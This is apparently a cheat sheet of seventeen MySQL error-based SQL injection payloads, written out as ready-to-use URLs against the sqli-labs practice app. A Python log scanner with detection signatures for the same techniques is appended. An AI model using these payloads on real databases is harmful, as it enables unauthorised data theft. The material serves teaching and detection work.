1. extractvalue() error-based injection

  http://192.168.64.135//sqlib/Less-1/index.php?id=1' and (extractvalue(1,concat(0x3a,version())),1)--+


  SELECT EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'));

Bypassing the error-message length limit:

  http://43.247.91.228:84/Less-1/?id=1' and EXTRACTVALUE(0,CONCAT(hex(hex(version())),repeat(0,500),'.'))--+

Hex-decode the returned value twice.

2. updatexml() error-based injection

  http://192.168.64.135//sqlib/Less-1/index.php?id=1' and updatexml(1,concat(0x3a,version()),3)--+

The resulting SQL statement:

  SELECT * FROM users WHERE id='1' and updatexml(1,concat(0x3a,version()),3)-- ' LIMIT 0,1


3. ST_LatFromGeoHash() error-based injection

MariaDB 5.5.65 does not support this error-based injection; MySQL 5.0, 5.1 and 5.5 do not have the function either.

  [root@localhost ~]# mysql --version
  mysql Ver 15.1 Distrib 5.5.65-MariaDB, for Linux (x86_64) using readline 5.1

MySQL 5.7 supports this error-based injection:

  select ST_LatFromGeoHash(user());
  select ST_LatFromGeoHash(version());


4. ST_LongFromGeoHash() error-based injection

MySQL 5.7 supports this error-based injection:

  select ST_LongFromGeoHash(version());
  select ST_LongFromGeoHash(user());


5. GTID_SUBSET() error-based injection

  select GTID_SUBSET(version(),1);
  select GTID_SUBSET(user(),1);


6. GTID_SUBTRACT() error-based injection

  select GTID_SUBTRACT(version(),1);
  select GTID_SUBTRACT(user(),1);


7. ST_PointFromGeoHash() error-based injection

  select ST_PointFromGeoHash(version(),1);
  select ST_PointFromGeoHash(user(),1);


8. polygon() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and polygon((select * from(select * from(select user())a)b))--+


9. exp() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and exp(~(select * from(select user())a))--+


10. multipoint() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and multipoint((select * from(select * from(select version())a)b))--+


11. geometrycollection() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and geometrycollection((select * from(select * from(select user())a)b))--+


12. multipolygon() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and multipolygon((select * from(select * from(select user())a)b))--+


13. linestring() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and linestring((select * from(select * from(select user())a)b))--+


14. multilinestring() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and multilinestring((select * from(select * from(select user())a)b))--+


15. floor() error-based injection

  http://43.247.91.228:84/Less-1/?id=1' and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+


16. NAME_CONST() injection

  http://43.247.91.228:84/Less-1/?id=1'union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x --+


17. Overflow error-based injection using !

  http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20(!(select%20*%20from%20(select%20user())x)%20-%20~0),2,3--+

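A detection-side check that follows from this catalogue, as an added example that is not part of the original post: a Python scanner that URL-decodes each request's query string from web-server access logs and flags the function families listed in the sections above. The log lines, IP addresses and family names are constructed for the example.

```python
"""Scan web-server log lines for the MySQL error-based injection primitives
catalogued above (added example, not from the original post)."""
import re
from urllib.parse import unquote_plus

# One regex per family of error-producing functions used by the payloads above;
# the family names are labels chosen for this example.
SIGNATURES = {
    "xpath_error": r"\b(extractvalue|updatexml)\s*\(",
    "geohash_error": r"\bst_(lat|long|point)fromgeohash\s*\(",
    "gtid_error": r"\bgtid_(subset|subtract)\s*\(",
    "geometry_error": r"\b(polygon|multipoint|geometrycollection|multipolygon|linestring|multilinestring)\s*\(",
    "exp_overflow": r"\bexp\s*\(\s*~",
    "floor_rand_groupby": r"\bfloor\s*\(\s*rand\s*\(.*\bgroup\s+by\b",
    "name_const": r"\bname_const\s*\(",
    "not_overflow": r"!\s*\(\s*select\b.*-\s*~0",
}
PATTERNS = {name: re.compile(rx, re.I | re.S) for name, rx in SIGNATURES.items()}
LOG_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')  # request target of a combined-format line

def normalise_query(raw_query: str) -> str:
    """URL-decode twice (catches double-encoded payloads), collapse whitespace, lower-case."""
    decoded = unquote_plus(unquote_plus(raw_query))
    return re.sub(r"\s+", " ", decoded).lower()

def match_error_based(raw_query: str) -> list:
    """Return the sorted family names whose signature appears in one query string."""
    q = normalise_query(raw_query)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(q))

def scan_log(lines):
    """Return (client_ip, path, families) for every request whose query string matches."""
    hits = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        families = match_error_based(query)
        if families:
            hits.append((line.split(" ", 1)[0], path, families))
    return hits

# Constructed sample lines (documentation-range IPs, not real traffic); the last one is benign.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1%27%20and%20updatexml(1,concat(0x3a,version()),3)--+ HTTP/1.1" 200 734',
    '192.0.2.12 - - [01/Jan/2024:10:00:02 +0000] "GET /Less-1/?id=1%27%20and%20exp(~(select%20*%20from(select%20user())a))--+ HTTP/1.1" 200 734',
    '192.0.2.13 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=polygon+area+formula HTTP/1.1" 200 2048',
]
```

Matching on function names alone will still produce false positives on legitimate parameters that happen to contain SQL-like text, so treat hits as triage candidates and correlate them with database error strings in the application's responses.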